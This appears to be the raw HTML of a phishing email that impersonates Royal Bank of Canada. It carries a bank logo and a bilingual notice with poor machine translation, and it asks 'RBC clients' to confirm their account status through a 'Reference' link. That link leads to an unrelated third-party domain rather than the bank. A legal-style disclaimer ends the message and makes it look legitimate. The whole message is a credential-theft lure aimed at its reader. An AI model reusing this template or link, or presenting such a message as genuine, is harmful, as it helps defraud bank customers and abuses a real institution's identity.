<p id="ecxyiv6642416004yui_3_16_0_1_1408086662051_2031" style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
<img alt="" height="55" onclick="onClickUnsafeLink(event);" src="http://www.rbc.com/_assets-custom/images/blue-water/rbc-logo.png" style="line-height: 18.459999084472656px;" width="48"></p>
<p id="ecxyiv6642416004yui_3_16_0_1_1408086662051_2153" style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
&nbsp;</p>
<h1 id="ecxcontentStart" class="ecxwebTitle" style="line-height: 31.950000762939453px; color: rgb(0, 0, 0); font-size: 23px; font-family: 'Segoe UI Light', 'Segoe UI Web Light', 'Segoe UI Web Regular', 'Segoe UI', 'Segoe UI Symbol', HelveticaNeue-Light, 'Helvetica Neue', Arial, sans-serif; font-weight: normal; margin: 0px 0px 5px; font-style: normal; font-variant: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255);">
Royal Bank Of Canada</h1>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
Attention,<span class="Apple-converted-space">&nbsp;</span><span id="ecxresult_box0" class="ecxshort_text" lang="fr" style="line-height: 18.459999084472656px;" tabindex="-1"><span class="ecxhps" style="line-height: 18.459999084472656px;">client</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">RBC</span></span></p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
&nbsp;</p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
Due to recent security updates made on our online banking servers we have 
decided upon this unscheduled security update, please follow the reference below 
to confirm some neccessary information to confirm you account status.</p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
&nbsp;</p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
<a href="http://pa-healthquotes.com/biz-inc/x-inc/index.php" onclick="onClickUnsafeLink(event);" style="line-height: 18.459999084472656px; font-weight: inherit; text-decoration: underline; color: rgb(0, 104, 207); cursor: pointer;" target="_blank">
<strong style="line-height: 18.459999084472656px; font-weight: bold;">Reference</strong></a>.</p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
<br class="ecxauto-style1" style="line-height: 18.459999084472656px;">
<span id="ecxresult_box" lang="fr" style="line-height: 18.459999084472656px;" tabindex="-1">
<span class="ecxhps" style="line-height: 18.459999084472656px;">Grâce à</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">des 
mises à jour</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">de 
sécurité</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">récentes 
faites sur</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">nos 
serveurs</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">bankking</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">en 
ligne, nous</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">avons</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">décidé</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">cette 
mise à jour</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">de 
sécurité</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">imprévu</span><span style="line-height: 18.459999084472656px;">,</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">s'il 
vous plaît suivez</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">la 
référence</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">ci-dessous 
pour</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">confirmer</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">certaines</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">information</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">neccessary</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">pour 
confirmer</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">votre 
compte</span><span class="Apple-converted-space">&nbsp;</span><span class="ecxhps" style="line-height: 18.459999084472656px;">statut</span><span style="line-height: 18.459999084472656px;">.</span></span></p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
&nbsp;</p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
&nbsp;<strong style="line-height: 18.459999084472656px; font-weight: bold;"><a href="http://pa-healthquotes.com/biz-inc/x-inc/index.php" onclick="onClickUnsafeLink(event);" style="line-height: 18.459999084472656px; font-weight: inherit; text-decoration: underline; color: rgb(0, 104, 207); cursor: pointer;" target="_blank">référence.</a></strong></p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
&nbsp;</p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br style="line-height: 18.459999084472656px;">
NOTICE: This communication is intended only for the person or entity to which it 
is addressed and may contain confidential, proprietary, and/or privileged<span class="Apple-converted-space">&nbsp;</span><br style="line-height: 18.459999084472656px;">
material. Unless you are the intended addressee, any review, reliance, 
dissemination, distribution, copying or use whatsoever of this communication s<span class="Apple-converted-space">&nbsp;</span><br style="line-height: 18.459999084472656px;">
is strictly prohibited. If you received this in error, please reply immediately 
and delete the material from all computers. Email sent through the<span class="Apple-converted-space">&nbsp;</span><br style="line-height: 18.459999084472656px;">
Internet is NOT secure.</p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
&nbsp;</p>
<p style="line-height: normal; margin: 0px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding: 0px; display: block; font-size: 13px; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
Do not use email to send us confidential information such as credit card 
numbers, personal identification numbers, Security numbers, account numbers or 
other confidential information.</p>